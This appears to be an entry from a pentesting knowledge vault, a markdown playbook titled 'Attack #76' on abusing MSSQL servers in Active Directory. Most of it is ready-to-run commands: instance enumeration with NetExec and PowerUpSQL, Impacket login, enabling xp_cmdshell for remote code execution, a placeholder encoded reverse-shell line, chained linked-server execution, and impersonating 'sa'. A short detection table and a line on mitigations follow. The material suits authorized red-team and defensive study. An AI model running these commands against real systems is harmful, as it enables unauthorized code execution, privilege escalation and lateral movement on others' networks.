attack-76-mssql-server-and-linked-server-abuse.md (4688B)
1 --- 2 title: "Attack #76 β MSSQL Server and Linked Server Abuse" 3 description: "MSSQL servers in AD environments can be exploited for privilege escalation and lateral movement. Key techniques include: xp_cmdshell for RCE, linkedβ¦" 4 category: active-directory 5 subcategory: "Advanced & Post-Exploitation" 6 tags: ["active-directory", "adcs", "privilege-escalation", "lateral-movement", "sql-injection"] 7 tools: ["NetExec", "Impacket", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/π· Attack #76 β MSSQL Server and Linked Server Abuse.md" 11 --- 12 # π· Attack #76 β MSSQL Server & Linked Server Abuse 13 14 *** 15 16 ## π How It Works 17 18 MSSQL servers in AD environments can be exploited for privilege escalation and lateral movement. Key techniques include: **xp_cmdshell** for RCE, **linked servers** for cross-server lateral movement (hopping through database links to reach otherwise unreachable servers), and **impersonation** to escalate from a low-privileged DB user to `sa`. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **MSSQL access** | Domain user may have default access to MSSQL instances | 27 | **xp_cmdshell or impersonation rights** | For execution and escalation | 28 29 *** 30 31 ## π» Full Commands 32 33 ### π΅ Enumerate MSSQL Instances 34 35 ```bash 36 # ββ NetExec βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 37 nxc mssql 10.10.10.0/24 -u low_user -p 'Password1' 38 39 # ββ PowerUpSQL ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 40 Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded 41 ``` 42 43 ### π΄ xp_cmdshell β RCE 44 45 ```bash 46 # ββ Impacket mssqlclient.py βββββββββββββββββββββββββββββββββββββββββββββββββββ 47 mssqlclient.py corp.local/low_user:'Password1'@SQL01.corp.local -windows-auth 48 49 # Inside MSSQL: 50 # enable_xp_cmdshell 51 # xp_cmdshell whoami 52 # xp_cmdshell powershell -e <base64_reverse_shell> 53 ``` 54 55 ```powershell 56 # ββ PowerUpSQL ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 57 Invoke-SQLOSCmd -Instance SQL01.corp.local -Command "whoami" 58 ``` 59 60 ### π΄ Linked Server Hopping 61 62 ```sql 63 -- ββ Find linked servers ββββββββββββββββββββββββββββββββββββββββββββββββββββββ 64 SELECT * FROM master..sysservers; 65 EXEC sp_linkedservers; 66 67 -- ββ Execute on linked server ββββββββββββββββββββββββββββββββββββββββββββββββββ 68 EXEC ('xp_cmdshell ''whoami''') AT [SQL02.corp.local]; 69 70 -- ββ Double hop (chain through linked servers) βββββββββββββββββββββββββββββββββ 71 EXEC ('EXEC (''xp_cmdshell ''''whoami'''''') AT [SQL03.corp.local]') AT [SQL02.corp.local]; 72 ``` 73 74 ### π΄ Impersonation 75 76 ```sql 77 -- ββ Check who you can impersonate βββββββββββββββββββββββββββββββββββββββββββββ 78 SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE'; 79 80 -- ββ Impersonate sa ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 81 EXECUTE AS LOGIN = 'sa'; 82 EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; 83 EXEC xp_cmdshell 'whoami'; 84 ``` 85 86 *** 87 88 ## π‘οΈ Detection β Event IDs 89 90 | Event ID | Source | What to Look For | 91 |---|---|---| 92 | **15457** | SQL Server | xp_cmdshell enabled | 93 | **18456** | SQL Server | Failed login attempts | 94 | **4688** | Security Log | sqlservr.exe spawning cmd.exe/powershell | 95 96 *** 97 98 ## π Attack Chain Context 99 100 ``` 101 [MSSQL Abuse] βββ RCE via xp_cmdshell / lateral move via linked servers 102 β 103 ββββ π» xp_cmdshell β SYSTEM/service account on DB server 104 ββββ π Linked servers β hop to unreachable network segments 105 ββββ π Defeated by: disable xp_cmdshell, audit linked servers, least privilege 106 ``` 107 108 *** 109 110 > β **Attack #76 β MSSQL/Linked Server Abuse complete.**